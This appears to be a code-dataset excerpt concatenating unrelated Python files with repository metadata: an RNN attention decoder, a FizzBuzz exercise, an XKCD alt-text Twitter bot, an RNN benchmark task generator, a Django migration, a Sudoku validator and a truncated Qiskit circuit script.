if USE_CUDA:
attn_energies_3 = attn_energies_3.cuda()
else:
hidden_2 = hidden.transpose(0,1) #hidden_2 : [Batch x 1 x hidden]
hidden_2 = hidden_2.expand(encoder_outputs.shape[0],encoder_outputs.shape[1],encoder_outputs.shape[2]) #hidden_2 : [Batch x Seq x Hidden]
attn_energies_3 = self.attn(hidden_2).squeeze(2) #Batch x seq
attn_energies_3 = attn_energies_3.cuda()
if not(self.soft):
pt = self.sig(F.tanh(self.Wp(hidden.squeeze(0)))).unsqueeze(1) #[Batch x 1 x hidden]
pt = pt.bmm(self.Vp.expand(pt.shape[0], self.Vp.shape[0], self.Vp.shape[1])).unsqueeze(1) #[Batch x1]
pt = torch.tensor(X_lengths) * pt #pt: [Batch]
pt = pt.expand(pt.shape[0],encoder_outputs.shape[1]) #[Batch x seq]
s = torch.tensor([[j >= pt - self.D and j <= pt + self.D for j in range(X_lengths[i])] + [0.0]*(encoder_outputs.shape[1]- X_lengths[i]) for i in range(encoder_outputs.shape[0])]) #[batch x length of each sequence]
pointer_coeffs = torch.exp(( s - pt )**2/(-2*(self.D/2)**2))
attn_energies_3 = attn_energies_3 * pointer_coeffs
return F.softmax(attn_energies_3, dim=1).unsqueeze(1)#[Batch x 1 x Seq]
# Normalize energies to weights in range 0 to 1, resize to Bx1xS
def score(self, hidden, encoder_output):
if self.method == 'dot':
energy = hidden.dot(encoder_output)
return energy
elif self.method == 'general':
energy = self.attn(encoder_output) #energy: [Batch x Seq x hidden]
energy = hidden.dot(energy) #hidden : [Batch x hidden x 1]
return energy
elif self.method == 'concat':
hidden = hidden.transpose(1,2) #hidden: [Batch x 1 x hidden]
energy = self.attn(torch.cat((hidden.expand(encoder_output.shape[0],encoder_output.shape[1],encoder_output.shape[2]), encoder_output), 2)) #energy: [Batch x Seq x hidden]
energy = self.v.expand(hidden.shape[0],hidden.shape[2],1).dot(energy)
return energy
def score_2(self, hidden, encoder_output):
if self.method == 'dot':
energy = hidden.dot(encoder_output)
return energy
elif self.method == 'general':
energy = self.attn(encoder_output)
energy = energy.matmul(hidden)
return energy
elif self.method == 'concat':
hidden = hidden.transpose(1,2) #hidden: [Batch x 1 x hidden]
energy = self.attn(torch.cat((hidden.expand(encoder_output.shape[0],encoder_output.shape[1],encoder_output.shape[2]), encoder_output), 2)) #energy: [Batch x Seq x hidden]
energy = energy.matmul(self.v.expand(hidden.shape[0],hidden.shape[2],1))
return energy
# Fully vectorized implementation - 'general' case
def score_3(self, hidden, encoder_output):
if self.method == 'dot':
energy = encoder_output.bmm(hidden)
return energy
elif self.method == 'general':
energy = self.attn(encoder_output) #energy: [Batch x Seq x hidden]
energy = energy.bmm(hidden) #hidden: [Batch x hidden x 1]
return energy
elif self.method == 'concat':
hidden = hidden.transpose(1,2) #hidden: [Batch x 1 x hidden]
energy = self.attn(torch.cat((hidden.expand(encoder_output.shape[0],encoder_output.shape[1],encoder_output.shape[2]), encoder_output), 2)) #energy: [Batch x Seq x hidden]
energy = energy.bmm(self.v.expand(hidden.shape[0],hidden.shape[2],1))
return energy
class LuongAttnDecoderRNN(nn.Module):
def __init__(self, attn_model, hidden_size, output_size, n_layers=1, dropout=0.1, bi=0, bert_sent=0):
super(LuongAttnDecoderRNN, self).__init__()
# Keep for reference
self.attn_model = attn_model
self.hidden_size = hidden_size
self.output_size = output_size
self.n_layers = n_layers
self.dropout = dropout
# Define layers
self.embedding = nn.Embedding(output_size, hidden_size*2)
self.embedding_dropout = nn.Dropout(dropout)
self.gru = nn.GRU(hidden_size*2, hidden_size*2, n_layers, dropout=dropout)
self.concat = nn.Linear(hidden_size * 4, hidden_size*2)
self.out = nn.Linear(hidden_size*2, output_size)
# Choose attention model
if attn_model != 'none':
self.attn = Attn(attn_model, hidden_size*2)
# =============================================================================
# self.word2vec = word2vec
# if word2vec == 1:
# word_vectors = torch.FloatTensor(word_vectors).cuda()
# self.embedding = self.embedding.from_pretrained(word_vectors)
# self.word2vec_lin = nn.Linear(300, hidden_size*2)
#
# =============================================================================
self.bert_sent = bert_sent
if bert_sent == 1:
self.bert_lin = nn.Linear(768, self.hidden_size*2)
self.bert_encoded_lin = nn.Linear(768, self.hidden_size*2)
#if bi == 1:
# self.W_bi = nn.Linear(hidden_size*2, hidden_size)
#else:
# pass
def forward(self, input_seq, last_hidden, encoder_outputs):
# Note: we run this one step at a time
# input_seq : [batch_size], something like torch.LongTensor([SOS_token] * small_batch_size)
# last_hidden: last elemnt of decoder_outputs [1 x batch_size x hidden]
# encoder_outputs: [batch_size x seq x hidden]
# Get the embedding of the current input word (last output word)
batch_size = input_seq.size(0)
embedded = self.embedding(input_seq)
embedded = self.embedding_dropout(embedded)
#No need for batch_irst = True in the gru because of the next line
embedded = embedded.view(1, batch_size, self.hidden_size*2) # embedded: [1 x Batch x hidden]
#if last_hidden.shape[-1] == self.hidden_size*2:
# last_hidden = self.W_bi(last_hidden)
#print("last hidden ", last_hidden.shape)
if len(last_hidden.shape) == 2:
last_hidden = last_hidden.unsqueeze(0)
if self.bert_sent == 1 and last_hidden.shape[-1] == 768:
last_hidden = self.bert_lin(last_hidden)
embedded = embedded.contiguous(); last_hidden = last_hidden.contiguous()
if self.bert_sent ==1:
encoder_outputs = self.bert_encoded_lin(encoder_outputs)
# Get current hidden state from input word and last hidden state
rnn_output, hidden = self.gru(embedded, last_hidden) #rnn output: [1 x Batch x Hidden], hidden: [1 x Batch x Hidden]
#print("hidden ", hidden.shape)
# Calculate attention from current RNN state and all encoder outputs;
# apply to encoder outputs to get weighted average
attn_weights = self.attn(rnn_output, encoder_outputs) #attn_weights : [Batch x 1 x Seq]
context = attn_weights.bmm(encoder_outputs) #context: [Batch x 1 x Hidden]
# Attentional vector using the RNN hidden state and context vector
# concatenated together (Luong eq. 5)
rnn_output = rnn_output.squeeze(0) # rnn_output is now: [Batch x Hidden]
context = context.squeeze(1) # context is now: [Batch x Hidden]
concat_input = torch.cat((rnn_output, context), 1)
concat_output = torch.tanh(self.concat(concat_input))
# Finally predict next token (Luong eq. 6, without softmax)
output = self.out(concat_output) #output is : [Batch*output_size] (output size is the number of all vocabs)
# Return final output, hidden state, and attention weights (for visualization)
return output, hidden, attn_weights
class BahdanauAttnDecoderRNN(nn.Module):
def __init__(self,attn_model, hidden_size, output_size, n_layers=1, dropout_p=0.1):
super(BahdanauAttnDecoderRNN, self).__init__()
assert attn_model == 'concat'
# Define parameters
self.hidden_size = hidden_size
self.output_size = output_size
self.n_layers = n_layers
self.dropout_p = dropout_p
# Define layers
self.embedding = nn.Embedding(output_size, hidden_size)
self.embedding_dropout = nn.Dropout(dropout_p)
self.attn = Attn('concat', hidden_size)
self.gru = nn.GRU(hidden_size*2, hidden_size, n_layers, dropout=dropout_p)
self.out = nn.Linear(hidden_size, output_size)
def forward(self, input_seq, last_hidden, encoder_outputs):
# Note: we run this one step at a time
# input_seq : [batch_size], something like torch.LongTensor([SOS_token] * small_batch_size)
# last_hidden: last elemnt of decoder_outputs [1 x batch_size x hidden]
# encoder_outputs: [batch_size x seq x hidden]
batch_size = input_seq.size(0)
embedded = self.embedding(input_seq)
embedded = self.embedding_dropout(embedded)
embedded = embedded.view(1, batch_size, self.hidden_size) # embedded: [1 x Batch x hidden]
# Calculate attention weights and apply to encoder outputs
#last_hidden[-1]: [Batch x hidden], last_hidden[-1].unsqueeze(0): [1 x Batch x hidden]
last_hidden = last_hidden.view(1,batch_size, self.hidden_size)
attn_weights = self.attn(last_hidden, encoder_outputs) #attn_weights : [Batch x 1 x Seq]
context = attn_weights.bmm(encoder_outputs) #context: [Batch x 1 x Hidden]
context = context.transpose(0, 1) #context: [1 x Batch x Hidden]
# Combine embedded input word and attended context, run through RNN
rnn_input = torch.cat((embedded, context), 2) #rnn_input: [1 x Batch x Hidden*2]
rnn_input = rnn_input.contiguous(); last_hidden = last_hidden.contiguous()
output, hidden = self.gru(rnn_input, last_hidden) #output: [1 x Batch x Hidden], hidden: [1 x Batch x Hidden]
# Final output layer
output = output.squeeze(0) # output: [Batch x Hidden]
#context = context.squeeze(0) # context: [Batch x Hidden]
#output = F.log_softmax(self.out(torch.cat((output, context), 1))) #output: [Batch*output_size]
output = F.log_softmax(self.out(output), dim=1) #output: [Batch*output_size]
# Return final output, hidden state, and attention weights (for visualization)
return output, hidden, attn_weights
| [
"jointparalearning@jointparalearning.com"
] | jointparalearning@jointparalearning.com |
4756fbcfb9c7db0ebaf8e40767267cae76c6d7ea | 7150c2837847ec1bbbb61c446508b707f81ddf68 | /lesson3.py | 8ac1203657c60f34fb5d4b2db06fbfefdd3f4344 | [] | no_license | elisabethboeck-aea/PythonKurs_01_20210119 | 63dc3f3d913c0fa57b8e023506b4a053dae25174 | 9cc3f68583c35b0c31d74acdc840a255aa51d00a | refs/heads/master | 2023-05-06T22:34:50.010815 | 2021-05-20T07:01:14 | 2021-05-20T07:01:14 | 362,727,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 658 | py | # Beispiel: Eingabe Zahl zwischen 1 und 100, alle Zahlen bis zu Eingabe werden gezeigt, wenn Ausgabezahl/3 dann wird "fizz" ausgegeben, bei /5 "buzz"
# wenn beides zutrifft (/3 und /5) "fizzbuzz"
# Anmerkung: % ist der der modulo Opperator, dieser prüft, ob bei Division ein Rest bleibt. Für Prozentrechnung muss tatsächlich /100 dividiert werden!
end_zahl = int(input("Bitte Zahl zwischen 1 und 100 eingeben: "))
for number in range(1, end_zahl + 1):
if number % 3 == 0 and number % 5 == 0:
print("fizzbuzz")
elif number % 3 == 0:
print ("fizz")
elif number % 5 == 0:
print("buzz")
else:
print(number)
| [
"elisabeth.boeck@energyagency.at"
] | elisabeth.boeck@energyagency.at |
4b76105a93032dcd86dc1fa2804ef0f2d9762700 | e8905aa363484abb197553fa516aea315238048f | /xkcd_alt.py | ced7662a57f6579a035d1d4128872e6f4a9b8241 | [
"MIT"
] | permissive | baogianghoangvu/XKCDAltTextBot | 6085d45579d28c0e7933fbbdd8fad5c8206a8cd3 | f6533c303c215c0db6e3e0e987cc51ae1c3c8c33 | refs/heads/master | 2023-05-18T13:34:29.035674 | 2021-06-06T15:19:32 | 2021-06-06T15:19:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,672 | py | """This is the XKCD Alt Text Bot.
This bot checks once every 15 seconds for new Tweets from a target bot. If one is found, it accesses
the linked image, extracts the image alt text, and Tweets it as a reply."""
import time # Program sleeping
import datetime # Cancels Tweet if older than 6 hours
import calendar # Converts calendar abbreviation to integer
from dateutil.tz import gettz # Switches to UTC in recent Tweet check
import yaml # API keys, access tokens, and custom logs
import os # Used by Heroku for environmental variable
import math # Round up number of tweets needed
import re # Finds the most recent bot tweet
import requests # Accessing API
from requests_oauthlib import OAuth1 # OAuth
from bs4 import BeautifulSoup # HTML searching
# Global vars
LOG_NAME = None
BOT = None
TARGET = None
WHERE = 0
URL_NUMBER = 0
class Twitter():
"""This class handles all API requests to Twitter."""
def __init__(self, auth):
"""This class constructor collects the OAuth keys for the class."""
self.auth = auth
def get(self):
"""This function determines if a new Tweet has been posted, and returns it.
Mentions of 'target' refer to the target Twitter bot, mentions of 'bot' or 'this' refer to this Twitter bot."""
# Build payloads for source bot and this bot retrieval
bot_payload = {'screen_name': '{}'.format(BOT), 'count': '10'}
target_payload = {'screen_name': '{}'.format(TARGET), 'count': '1'}
# Retrieve data from Twitter retrievals
for attempt in range(6):
if attempt == 5: # Too many attempts
print('Twitter retrieval failed ({}), see below response.'.format(str(target_raw.status_code)))
print('Twitter error message:\n\n{}'.format(target_raw.json()))
del bot_payload, target_payload
return 'crash' # Enter log protection mode
print('Retrieving new {}s...'.format(LOG_NAME))
bot_raw = requests.get('https://api.twitter.com/1.1/statuses/user_timeline.json',
params=bot_payload, auth=self.auth)
target_raw = requests.get('https://api.twitter.com/1.1/statuses/user_timeline.json',
params=target_payload, auth=self.auth)
if target_raw.status_code == 200: # Good request
pass
elif target_raw.status_code >= 429 or target_raw.status_code == 420:
# Twitter issue or rate limiting
print('Twitter retrival failed ({})'.format(target_raw.status_code))
print('Reattempting in 5 minutes...')
time.sleep(300) # sleep for 5 minutes and reattempt
continue
else: # Other problem in code
print('Twitter retrieval failed ({}), see below '.format(str(target_raw.status_code)) +
'response.')
print('Twitter error message:\n\n{}'.format(target_raw.json()))
del bot_payload, target_payload, bot_raw, target_raw
return 'crash' # Enter log protection mode
# Convert to JSON
bot_json = bot_raw.json()
target_json = target_raw.json()
# Create a list of all reply IDs
bot_replies = [bot_json[i]['in_reply_to_status_id'] for i in
range(len(bot_json))]
try:
if target_json[0]['id'] is None:
print('Twitter retrieval failed: No Tweet found')
del bot_payload, target_payload, bot_raw, target_raw, bot_json, target_json
return 'crash' # Enter log protection mode
except IndexError:
print('Twitter retrieval failed: No Tweet found')
del bot_payload, target_payload, bot_raw, target_raw, bot_json, target_json
return 'crash' # Enter log protection mode
for i in range(len(bot_replies)):
if bot_replies[i] == target_json[0]['id']:
try:
if bot_json[i]['retweeted_status'] is not None:
continue # Retweet, keep going
except KeyError:
return None # Already replied, sleep for 15 seconds
# Do not reply to tweets older than 6 hours
tweet_time_str = datetime.datetime(
int(target_json[0]['created_at'][-4:]),
list(calendar.month_abbr).index(target_json[0]['created_at'][4:7]),
int(target_json[0]['created_at'][8:10]),
int(target_json[0]['created_at'][11:13]),
int(target_json[0]['created_at'][14:16]),
int(target_json[0]['created_at'][17:19]),
0,
gettz('UTC')
)
tweet_time = time.mktime(tweet_time_str.timetuple())
del bot_payload, target_payload, bot_raw, target_raw, bot_json
if time.mktime(datetime.datetime.utcnow().timetuple()) - tweet_time > 21600:
del target_json
return None # Tweet is too old
else:
return target_json[0] # Return target Tweet
def post(self, tweet, reply):
"""This function Tweets the alt (title) text as a reply to the target account."""
print('Tweeting...')
tweet_payload = {'status': tweet, 'in_reply_to_status_id': reply,
'auto_populate_reply_metadata': 'true'}
# POST Tweet
for attempt in range(6):
if attempt == 5: # Too many attempts
print('Tweeting failed ({}), see below response.'.format(str(tweet.status_code)))
print('Twitter error message:\n\n{}'.format(tweet.json()))
del tweet_payload
return 'crash' # Enter log protection mode
tweet = requests.post('https://api.twitter.com/1.1/statuses/update.json',
data=tweet_payload, auth=self.auth)
if tweet.status_code == 200: # Good request
print('Successfully Tweeted:\n\n{}'.format(tweet.json()))
del tweet_payload
return tweet.json()
elif tweet.status_code >= 429 or tweet.status_code == 420 or \
tweet.status_code == 403:
if tweet.json()['errors'][0]['code'] == 187: # Duplicate Tweet
print('Duplicate Tweet detected, ending attempt.')
return None
# Twitter issue or rate limiting
print('Tweeting failed ({})'.format(tweet.status_code))
print('Reattempting in 5 minutes...')
time.sleep(300) # sleep for 5 minutes and reattempt
continue
else: # Other problem in code
print('Tweeting failed ({}), see below response.'.format(str(tweet.status_code)))
print('Twitter error message:\n\n{}'.format(tweet.json()))
del tweet, tweet_payload
return 'crash' # Enter log protection mode
def tweetstorm(self, body, num_tweets, orig_tweet):
"""This function posts a chain of tweets if the full Tweet is longer than 280 characters."""
seek = 0 # Location in body of text
for n in range(num_tweets): # Post each individual tweet // twit: a short tweet
if (n+1) < num_tweets:
endspace = body[seek:seek+280].rfind(' ') # Find the last space under 280 chars
twit = body[seek:endspace] # Get up to 280 chars of full words
else: # Final tweet
twit = body[seek:] # Use the remaining characters
if n == 0:
result = self.post(twit, orig_tweet) # Reply to the original tweet
else:
result = self.post(twit, reply_to) # Reply to the previous tweet
if result == 'crash':
return 'crash' # Enter log protection mode
reply_to = result['id_str'] # Tweet for next twit to reply to
seek += endspace + 1 # Start the next sequence from after the space
return None
def get_config():
"""This function retrieves API keys, access tokens, and other key data from the config file."""
global LOG_NAME, TARGET, URL_NUMBER, WHERE, BOT
print("Building OAuth header...")
if 'XKCD_APPNAME' in os.environ: # Running on a cloud server
key = [os.environ.get('API_KEY', None),
os.environ.get('API_SECRET_KEY', None),
os.environ.get('ACCESS_TOKEN', None),
os.environ.get('ACCESS_TOKEN_SECRET', None)]
LOG_NAME = os.environ.get('LOG_NAME', None)
TARGET = os.environ.get('TARGET', None)
URL_NUMBER = int(os.environ.get('URL_NUMBER', None))
WHERE = int(os.environ.get('WHERE', None))
BOT = os.environ.get('BOT', None)
else: # Running locally
with open('config.yaml') as config_file:
CONFIG = yaml.safe_load(config_file)
key = [CONFIG['API Key'],
CONFIG['API Secret Key'],
CONFIG['Access Token'],
CONFIG['Access Token Secret']]
LOG_NAME = CONFIG['Target name in logs']
TARGET = CONFIG['Target account handle']
URL_NUMBER = int(CONFIG['Tweet URL location'])
WHERE = int(CONFIG['Target image location on site'])
BOT = CONFIG['Your account handle']
for i in key:
if i is None: # Verify keys were loaded
print("OAuth initiation failed: API key or access token not found")
del key
return 'crash' # Enter log protection mode
auth = OAuth1(key[0], key[1], key[2], key[3])
print('OAuth initiation successful!')
del key
return auth
def retrieve_text(site):
"""This retrieves the HTML of the website, isolates the image title text, and formats it for the
Tweet."""
for attempt in range(11):
print('Accessing {} (attempt {} of 11)'.format(site, attempt+1))
html_raw = requests.get(site) # Retrieving raw HTML data
if html_raw.status_code != 200: # Data not successfully retrieved
if attempt < 6:
print('Could not access {} ({}). '.format(LOG_NAME, html_raw.status_code) +
'Trying again in 10 seconds...')
time.sleep(10) # Make 6 attempts with 10 second delays
elif attempt < 10:
print('Could not access {} ({}). '.format(LOG_NAME, html_raw.status_code) +
'Trying again in 60 seconds...')
time.sleep(60) # Make 4 attempts with 60 seconds delays
else:
print('{} retrieval failed: could not access {}'.format(LOG_NAME, site))
return 'crash' # Enter log protection mode
else: # Data retrieved
break
html = BeautifulSoup(html_raw.text, 'html.parser')
target_image = html.find_all('img', title=True) # Locates the only image with title text (the target)
if target_image is None:
print('Title extraction failed: image not found')
return 'crash' # Enter log protection mode
title = target_image[WHERE]['title'] # Extracts the title text
tweet_title = 'Title text: "{}"'.format(title)
# This block acts as a Tweet 'header'
tweet_header_size = 36 # URL is 23 chars
tweet_header = 'Alt text @ https://www.explainxkcd.com/wiki/index.php/{}#Transcript'.format(site[-5:-1]) + '\n\n'
tweet = tweet_header + tweet_title
if (len(tweet_title) + tweet_header_size) <= 280: # Char limit, incl. link
num_tweets = 1 # The number of tweets that must be created
else:
num_tweets = math.ceil((len(tweet_title) + tweet_header_size) / 280)
print('Tweet constructed')
del html_raw, html, target_image, title
return [tweet, num_tweets]
def crash():
"""This function protects logs by pinging google.com every 20 minutes."""
print('Entering log protection mode.')
while True:
a = requests.get('https://google.com') # Ping Google
del a
time.sleep(1200)
continue
if __name__ == '__main__':
# All mentions of 'crash' mean the program has crashed, and is entering log protection mode
auth = get_config() # Build authentication header and get config data
new_tweet_check = [0, None]
if auth == 'crash':
crash()
twitter = Twitter(auth)
while True: # Initialize main account loop
if new_tweet_check[0] > 3: # Too many attempts
print('Verification failed.')
new_tweet_check = [0, None]
continue
else:
original_tweet = twitter.get() # Check for new Tweets
if original_tweet == 'crash':
new_tweet_check = [0, None]
crash()
elif original_tweet is None:
print('No new {}s found. Sleeping for 15 seconds...'.format(LOG_NAME))
if new_tweet_check[0] > 0:
new_tweet_check[0] += 1
time.sleep(15)
else:
if new_tweet_check[1] is None: # Unverified new Tweet
new_tweet_check[1] = original_tweet['id']
print('Potential new {}. Waiting 5 seconds to verify...'.format(LOG_NAME))
time.sleep(5)
elif new_tweet_check[1] == original_tweet['id']: # Confirmed new Tweet
[body, num_tweets] = retrieve_text(original_tweet['entities']['urls'][URL_NUMBER]['expanded_url'])
if body == 'crash':
new_tweet_check = [0, None]
crash()
if num_tweets == 1:
result = twitter.post(body, original_tweet['id_str']) # Post one Tweet
else:
result = twitter.tweetstorm(body, num_tweets, original_tweet['id_str']) # Split into multiple Tweets
if result == 'crash':
new_tweet_check = [0, None]
crash()
else: # Successful Tweet
del result
print('Sleeping for 60 seconds...')
time.sleep(60)
new_tweet_check = [0, None]
else:
print('Twitter retrieval returned existing {}. Sleeping for 5 seconds...'.format(LOG_NAME))
new_tweet_check[0] += 1
time.sleep(5) | [
"rod.cam2014+dev@gmail.com"
] | rod.cam2014+dev@gmail.com |
617ade26306cc5241efc576079948c01168031fc | d3fbf48dcec6fa464ce2f1fd2c7e4adaf7c70021 | /tempOrder.py | 562d0e737e61a11c1b1b247c11e422cbab6741ba | [
"BSD-2-Clause"
] | permissive | anirudh9119/trainingRNNs | 26e3353ad505da3e2b93fd5973df8dd5e70f1ecd | fd64d608fe05d52306b6d6c24de428a6ebba9ac6 | refs/heads/master | 2021-01-22T00:10:30.583372 | 2016-01-14T21:01:46 | 2016-01-14T21:01:46 | 49,674,713 | 0 | 1 | null | 2016-01-14T20:57:46 | 2016-01-14T20:57:46 | null | UTF-8 | Python | false | false | 3,653 | py | # Copyright (c) 2012-2013, Razvan Pascanu
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Generate input and test sequence for the temporal order task.
Description
-----------
The input has 6 channels. At any time all channels are 0 except for one
which has value 1 (i.e. the 6 channels are used for a one-hot encoding
of a 6 possible symbols).
The first two channels are reserved for symbols {A, B}, the others
to {c,d,e,f}. At one random position `p0` in [1, L/10] either A or B
is showed. The same happens at a second position `p1` in [5*L/10, 6*L/10].
At all other position a random symbol from {c,d,e,f} is used.
At the end of the sequence one has to predict the order in which the
symbols where provided (either AA, AB, BA or BB).
Author: Razvan Pascanu
contact: r.pascanu@gmail
"""
import numpy
class TempOrderTask(object):
def __init__(self, rng, floatX):
self.rng = rng
self.floatX = floatX
self.nin = 6
self.nout = 4
self.classifType='lastSoftmax'
def generate(self, batchsize, length):
l = length
p0 = self.rng.randint(int(l*.1), size=(batchsize,)) + int(l*.1)
v0 = self.rng.randint(2, size=(batchsize,))
p1 = self.rng.randint(int(l*.1), size=(batchsize,)) + int(l*.5)
v1 = self.rng.randint(2, size=(batchsize,))
targ_vals = v0 + v1*2
vals = self.rng.randint(4, size=(l, batchsize))+2
vals[p0, numpy.arange(batchsize)] = v0
vals[p1, numpy.arange(batchsize)] = v1
data = numpy.zeros((l, batchsize, 6), dtype=self.floatX)
targ = numpy.zeros((batchsize, 4), dtype=self.floatX)
data.reshape((l*batchsize, 6))[numpy.arange(l*batchsize),
vals.flatten()] = 1.
targ[numpy.arange(batchsize), targ_vals] = 1.
return data, targ
if __name__ == '__main__':
print 'Testing temp Order task generator ..'
task = TempOrderTask(numpy.random.RandomState(123), 'float32')
seq, targ = task.generate(3, 25)
assert seq.dtype == 'float32'
assert targ.dtype == 'float32'
print 'Sequence 0'
print '----------'
print seq[:,0,:]
print 'Target:', targ[0]
print
print 'Sequence 1'
print '----------'
print seq[:,1,:]
print 'Target:', targ[1]
print
print 'Sequence 2'
print '----------'
print seq[:,2,:]
print 'Target', targ[2]
| [
"pascanur@iro"
] | pascanur@iro |
db3fbff4d594a4433e3b7910b144df9651be1e38 | c5ff1fa771515f699e8dd08b51815d9f4f938f6f | /comments/migrations/0001_initial.py | ab972431ff08043da7a4e60a02994c93c8b78d91 | [] | no_license | tungnm06/DjangoInstagram | a0ed56191e64df752adcd9e8357cea0f6c17f860 | 70ad031939eea41af9f7f7945f66b6cc930de870 | refs/heads/master | 2020-03-25T09:30:41.414415 | 2018-08-06T03:14:55 | 2018-08-06T03:14:55 | 143,670,323 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 978 | py | # Generated by Django 2.0.7 on 2018-07-18 19:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('customers', '0001_initial'),
('posts', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('createtime', models.DateTimeField()),
('updatetime', models.DateTimeField()),
('status', models.IntegerField(default=1)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='customers.Customer')),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.Post')),
],
),
]
| [
"tungnmd00439@fpt.edu.vn"
] | tungnmd00439@fpt.edu.vn |
93ceaaa0837665bdb5b617142ac9666feb369a25 | d26b4c0eb87ccd861ff99d7b78bb052cd5d3e421 | /python/SudokuValidator/main.py | 4fefd3635260994b5c5e473bff8ff5a758aa54b6 | [] | no_license | ngoodman90/CodingGame | 6ad8226253b94cc20c18bdd019b3c880301017ff | 529da15a964f92e5407522cea0c9b7a7063c05eb | refs/heads/master | 2021-01-10T07:07:30.880015 | 2020-05-08T13:36:23 | 2020-05-08T13:36:23 | 48,571,145 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | # https://www.codingame.com/training/easy/sudoku-validator
from itertools import chain
expected_values = list(range(1, 10))
def is_row_valid(row):
return sorted(row) == expected_values
def squares(grid):
yield grid[0][:3] + grid[1][:3] + grid[2][:3]
yield grid[3][:3] + grid[4][:3] + grid[5][:3]
yield grid[6][:3] + grid[7][:3] + grid[8][:3]
yield grid[0][3:6] + grid[1][3:6] + grid[2][3:6]
yield grid[3][3:6] + grid[4][3:6] + grid[5][3:6]
yield grid[6][3:6] + grid[7][3:6] + grid[8][3:6]
yield grid[0][6:9] + grid[1][6:9] + grid[2][6:9]
yield grid[3][6:9] + grid[4][6:9] + grid[5][6:9]
yield grid[6][6:9] + grid[7][6:9] + grid[8][6:9]
def columns(grid):
for i in range(9):
yield [row[i] for row in grid]
def is_grid_valid(grid):
return all(is_row_valid(row) for row in chain(grid, columns(grid), squares(grid)))
grid = [list(map(int, input().split())) for _ in range(9)]
print(str(is_grid_valid(grid)).lower())
| [
"ngoodman90@gmail.com"
] | ngoodman90@gmail.com |
2cbcad6a307bd6d1b5101f9e5781d7caaa236d91 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit_QC1087.py | 70d9c4bc57bcaa206e68809763018b4b54d22d38 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,454 | py | # qubit number=5
# total number=50
import cirq
import qiskit
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=31
prog.cz(input_qubit[1],input_qubit[0]) # number=32
prog.h(input_qubit[0]) # number=33
prog.h(input_qubit[1]) # number=44
prog.cz(input_qubit[0],input_qubit[1]) # number=45
prog.h(input_qubit[1]) # number=46
prog.cx(input_qubit[0],input_qubit[1]) # number=47
prog.x(input_qubit[1]) # number=48
prog.cx(input_qubit[0],input_qubit[1]) # number=49
prog.cx(input_qubit[0],input_qubit[1]) # number=42
prog.x(input_qubit[0]) # number=26
prog.cx(input_qubit[1],input_qubit[0]) # number=27
